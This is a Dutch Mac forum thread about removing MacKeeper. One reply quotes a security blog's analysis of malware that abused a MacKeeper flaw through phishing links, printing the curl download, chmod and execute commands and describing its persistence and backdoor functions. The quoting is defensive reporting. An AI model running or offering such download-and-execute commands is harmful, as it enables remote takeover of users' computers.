eerder topic   volgend topic
Vorige pagina   
Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 01:20    reactie #25
geplaatst door: HEXDIY
Sorry, nogmaals dubbele post.
Ik zat wat te knoeien met insert inline van een afbeelding binnen een citaat denk ik.
Dat regeerde wat vreemd.

(Bewerkt door HEXDIY om 23:03, 4-03-2016)

If it ain't broke, don't fix it! Recycle the planet, we're gonna need it! Think different, think twice, Apple!
M1 is a success! Please do not forget Mac OS.
Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 01:23    reactie #26
geplaatst door: HEXDIY
Ja hoor. Maar het wordt nog erger. MacKeeper kan nu niet langer pretenderen legitte OSX software te zijn.
Dit heb ik gister bij de zuiderburen gepost:

Citaat

Een beetje laat in het spel, maar nogmaals een bevestiging:
MacKeeper is vermomde malware:

http://baesystemsai.blogspot.com/201...mackeeper.html

Een citaat:

The first reports on this vulnerability suggested that no malicious MacKeeper URLs had been spotted in the wild yet. Well, not anymore.

Since the proof-of-concept was published, it took just days for the first instances to be seen in the wild.

The attack this post discusses can be carried out via a phishing email that contains malicious URL.

Once clicked, the users running MacKeeper will be presented with a dialog that suggests they are infected with malware, prompting them for a password to remove this. The actual reason is so that the malware could be executed with the admin rights.

The webpage hosted by the attackers in this particular case has the following format:

(voor geciteerde code geraak ik niet gepost, lees uit de links)[/b]

where [BASE_64_ENCODED_STUB], once decoded, contains the following commands interpreted and executed by MacKeeper, using system shell:

curl -A 'Safari' -o /Users/Shared/dufh
http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;
chmod 755 /Users/Shared/dufh;
cd /Users/Shared;
./dufh

The launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as"/bin/sh" (a symlink to the currently configured system shell), and the prompt message displayed to the user is:

"Your computer has malware that needs to be removed"
As a result, once the unsuspecting user click the malicious link, the following dialog box will pop up:

Once the password is specified, the malware will be downloaded, saved as /Users/Shared/dufh, and executed.

At this stage, the executable file dufh is a dropper. When run, it will dump an embedded executable and then launch it. The dropper will create a plist and update the LaunchAgents in order to enable an auto-start for the created executable ("<key>RunAtLoad</key>").

Backdoor functionality
The embedded executable is a bot that allows remote access.

It can perform the following actions:

• Open a pipe stream and execute shell commands
• Upload files to the C&C server
• Download files from the C&C server
• Set execution permissions and run downloaded files

The bot collects system information such as:

• List of all processes and their status
• Operating system name and version
• User name
• Availability of any VPN connections
Lees de rest in de link.

Ondanks een veroordeling in de USA voor Zeobit, blijkt dat ze via/na wellicht de verkoop aan Kromtech weer aan een aggressief (tele)verkoopsoffensief bezig zijn.

Getuige hiervan:
http://www.macfreak.nl/forums/topic/...l-verwijderen/

Hoog tijd dat Kromtech/ Zeobit hun lesje eens leren...

Enfin, met System Integrity Protection onder El Capitan komen ze er niet meer door denk ik...


http://www.intermactivity.be/forum/showthread.php?125410-MacKeeper-Malware-for-keeps!

Bron:
http://baesystemsai.blogspot.be/2015/06/new-mac-os-malware-exploits-mackeeper.html[img]

If it ain't broke, don't fix it! Recycle the planet, we're gonna need it! Think different, think twice, Apple!
M1 is a success! Please do not forget Mac OS.
Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 14:27    reactie #27
geplaatst door: malpiet
Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 14:50    reactie #28
geplaatst door: JGO
@Malpiet,

Schijnbaar zie je de ernst van het probleem niet.
MacKeeper is geen fatsoenlijke applicatie zoals Pages of iMovie het is Malware.
Malware moet verwijderd worden met anti- malware programma, voorheen Anti-virus programma's genoemd.

Doordrammende 8600, Zoevende G3 en
een MacMini
Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 17:01    reactie #29
geplaatst door: malpiet

Citaat
JGO om 14:50, 4-03-2016
@Malpiet,

Schijnbaar zie je de ernst van het probleem niet.
MacKeeper is geen fatsoenlijke applicatie zoals Pages of iMovie het is Malware.
Malware moet verwijderd worden met anti- malware programma, voorheen Anti-virus programma's genoemd.

Dus je kan MacKeeper niet geheel verwijderen met AppCleaner?

Hoe kan ik MacKeeper helemaal verwijderen?
4 maart 2016 - 19:24    reactie #30
geplaatst door: JGO
Ik stel zelfs dat het beter is van niet om het te proberen en wel om twee reden.
Apple heeft nooit  werk gemaakt van een bloedeigen uninstaller. Persoonlijk vind ik al jaren dat Apple hiermee achterloopt op MS Windows maar vanuit de structuur van Mac OSX kan ik het wel begrijpen. De applicaties zitten in een bundel en als je die verwijderd zijn restanten: plist en prefs bestandjes, vleugellam en verwaarloosbaar. Soms zijn applicaties wel gecompliceerder qua bestandsvoering, zoals Safari, die je dus nooit moet verwijderen want het maakt een essentieel onderdeel uit van de bestandsstructuur van OSX. Met Safari weggooien vraag je dus geheid om problemen. En daarmee zijn we dus aanbeland bij AppCleaner en de tweede reden.
AppCleaner? Ook al zo'n Tooltje dat ik feitelijk verafschuw want het kan ook zaken weggooien die OSX over de kling jaagt. Nou, houd je TM-kopie dan maar paraat!

Maar dan Malware.

Compilers van fatsoenlijke software zien al niet graag dat je hun applicaties verwijderd, malware dumpers willen dat zelfs helemáál niet. Daarom is Malware zo moeilijk te verwijderen.

In een vorige post haalde ik Genieo al aan.
Als je die probeert te verwijderen met Appcleaner zou het best mogelijk kunnen zijn dat het niet in de juiste volgorde gebeurd met als gevolg dat je met een lamme Mac opgescheept zit.

En hoe zit het dan met virussen?

Virussen an sich bestaan nog nauwelijks. Het sarcastische plezier van klierige bollebozen om software te ontwerpen die alleen 'virtuele' schade aan de functionaliteit van besturingssysteem en aanverwante programmatuur aanricht is voorbij. Met de opkomst van OSX kwam daar feitelijk al een einde aan. Onder andere omdat het exploiteren van eventuele mogelijkheden binnen OSX door de vergaande bevoegdheden structuur het erg lastig maakt om ondermijnende code te schrijven.
Voor Windows geldt dat ook maar hier ruilden de virussen hun plaats in voor malware.

Doordrammende 8600, Zoevende G3 en
een MacMini
Vorige pagina   
eerder topic   volgend topic